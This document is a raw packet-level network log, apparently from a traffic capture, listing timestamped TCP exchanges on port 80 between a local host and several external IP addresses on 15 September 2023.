                                                                                                                                                                              Sep 15, 2023 07:26:23.847130060 CEST804981360.43.154.138192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.847758055 CEST4981380192.168.2.360.43.154.138
                                                                                                                                                                              Sep 15, 2023 07:26:23.898057938 CEST4981780192.168.2.3206.191.152.37
                                                                                                                                                                              Sep 15, 2023 07:26:23.906970024 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.907015085 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.907057047 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.907058001 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.907109022 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.907130003 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.907592058 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.907663107 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.907675028 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.907701969 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.907721996 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.907741070 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.907771111 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.907782078 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.907803059 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.907821894 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.907841921 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.907860041 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.907881021 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.907897949 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.907934904 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.907941103 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.907980919 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.908020973 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.908086061 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.908123970 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.908159971 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.908159971 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.908179998 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.908221960 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.908233881 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.908288956 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.908305883 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.908344030 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.908374071 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.908412933 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.908453941 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.908516884 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.908554077 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.908588886 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.908612967 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.908654928 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.908689022 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.908757925 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.908793926 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.908862114 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.908865929 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.908930063 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.908956051 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.909018040 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.909056902 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.909121990 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.909126043 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.909190893 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.909198046 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.909260988 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.909796953 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.909837961 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.909859896 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.909873962 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.909898996 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.909912109 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.909940004 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.910001040 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.910041094 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.910101891 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.910350084 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.910418987 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.910479069 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.910542965 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.910552025 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.910588026 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.910609961 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.910651922 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.910659075 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.910712004 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.910759926 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.910799026 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.910824060 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.910867929 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.910870075 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.910904884 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.910929918 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.910975933 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.911550045 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.911614895 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.911643028 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.911737919 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.911765099 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.911803007 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.911807060 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.911865950 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.911875010 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.911911011 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.911936045 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.911973953 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.911979914 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.912045002 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.912590981 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.912667036 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.912702084 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.912739992 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:23.912766933 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.912790060 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:23.931483984 CEST4981880192.168.2.3108.167.164.216
                                                                                                                                                                              Sep 15, 2023 07:26:24.001863003 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.001928091 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.001970053 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.002008915 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.002047062 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.002084970 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.002110004 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.002127886 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.002172947 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.002177954 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.002217054 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.002218962 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.002243042 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.002255917 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.002290010 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.002294064 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.002310991 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.002347946 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.002407074 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.002449036 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.002466917 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.002501965 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.002521992 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.002583027 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.003061056 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.003102064 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.003192902 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.003226042 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.003253937 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.003287077 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.003325939 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.003345013 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.003382921 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.006108046 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.006146908 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.006185055 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.006222010 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.006263018 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.006299019 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.006299973 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.006335974 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.006336927 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.006378889 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.006408930 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.006438017 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.006484032 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.006493092 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.006524086 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.006536961 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.006561041 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.006577969 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.006597996 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.006618977 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.006635904 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.006674051 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.006683111 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.006717920 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.006735086 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.007425070 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.007466078 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.007493019 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.007503033 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.007514954 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.007540941 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.007558107 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.007577896 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.007605076 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.007615089 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.007642984 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.007652044 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.007663012 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.007714033 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.008429050 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.008466959 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.008497000 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.008503914 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.008521080 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.008543968 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.008568048 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.008582115 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.008603096 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.008618116 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.008636951 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.008676052 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.008683920 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.008733034 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.009396076 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.009438992 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.009457111 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.009476900 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.009497881 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.009514093 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.009536028 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.009552002 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.009572983 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.009589911 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.009608030 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.009629011 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.009649038 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.009687901 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.010350943 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.010390997 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.010412931 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.010431051 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.010448933 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.010466099 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.010488987 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.010504007 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.010526896 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.010544062 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.010564089 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.010581970 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.010601997 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.010637045 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.011467934 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.011543989 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.011581898 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.011607885 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.011617899 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.011632919 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.011673927 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.011687994 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.011724949 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.011743069 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.011781931 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.011797905 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.011848927 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.012387037 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.012485027 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.012526989 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.012556076 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.012586117 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.012643099 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.012670040 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.012741089 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.012777090 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.012778044 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.012794971 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.012840986 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.012878895 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.012938023 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.013230085 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.013360977 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.013489962 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.013529062 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.013566971 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.013602972 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.013622046 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.013639927 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.013642073 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.013679981 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.013689041 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.013710976 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.013719082 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.013737917 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.013775110 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.014468908 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.014550924 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.014605999 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.014622927 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.014631033 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.014687061 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.014731884 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.014801025 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.014827967 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.014857054 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.014883041 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.014921904 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.014942884 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.014966011 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.015448093 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.015525103 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.015583038 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.015599966 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.015602112 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.015662909 CEST4980480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:24.015678883 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.015722036 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.015789986 CEST8049804104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:24.015804052 CEST4980480192.168.2.3104.26.14.53
